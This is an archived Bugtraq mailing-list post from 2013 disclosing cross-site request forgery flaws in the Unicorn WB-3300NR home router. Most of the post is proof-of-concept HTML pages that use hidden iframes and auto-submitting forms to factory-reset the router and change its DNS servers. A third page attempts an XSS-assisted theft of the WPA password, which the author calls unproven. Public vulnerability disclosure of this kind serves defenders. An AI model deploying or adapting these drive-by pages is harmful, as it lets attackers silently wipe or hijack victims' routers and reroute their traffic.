[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
From: jsibley1 () gmail ! com
Date: 2013-10-30 14:42:39
Message-ID: 201310301442.r9UEgdiF016586 () sf01web2 ! securityfocus ! com
[Download RAW message or body]
# Exploit Title: Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Author: absane
# Blog: http://blog.noobroot.com
# Discovery date: October 29th 2013
# Vendor Homepage: http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr \
# Tested on: Unicorn WB-3300NR v1.0
# Firmware Version: V5.07.18_ko_UIS02
***************
*Vulnerability*
***************
The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require authentication, \
countless exploits exist.
******************
*Proof of Concept*
******************
1) Factory Reset
<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/SysToolRestoreSet" \
method="post" target="cantseeme"> <input type="hidden" name="CMD" value='SYS_CONF'>
<input type="hidden" name="GO" value='system_reboot.asp'>
<input type="hidden" name="CCMD" value='0'>
<script>document.csrf_form.submit();</script>
</body></html>
2) Alter the DNS Settings
<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" \
target="cantseeme"> <input type="hidden" name="GO" value='wan_dns.asp'>
<input type="hidden" name="rebootTag" value=''>
<input type="hidden" name="DSEN" value='1'>
<input type="hidden" name="DNSEN" value='on'>
<input type="hidden" name="DS1" value='8.8.4.4'>
<input type="hidden" name="DS2" value='8.8.8.8'>
<script>document.csrf_form.submit();</script>
</body></html>
3) WPA Password Disclosure (possibility)(not proven)
The following PoC code only demostrates that with CSRF and XSS, it might be possible \
to obtain the WPA password. However, I have been unable to do so without forcing the \
router to revert to factory defaults.
<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/WizardHandle" \
method="post" target="cantseeme"> <input type="hidden" name="MACC" value='"; var x = \
""; function y() {alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'> \
<script>document.csrf_form.submit();</script> </body></html>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic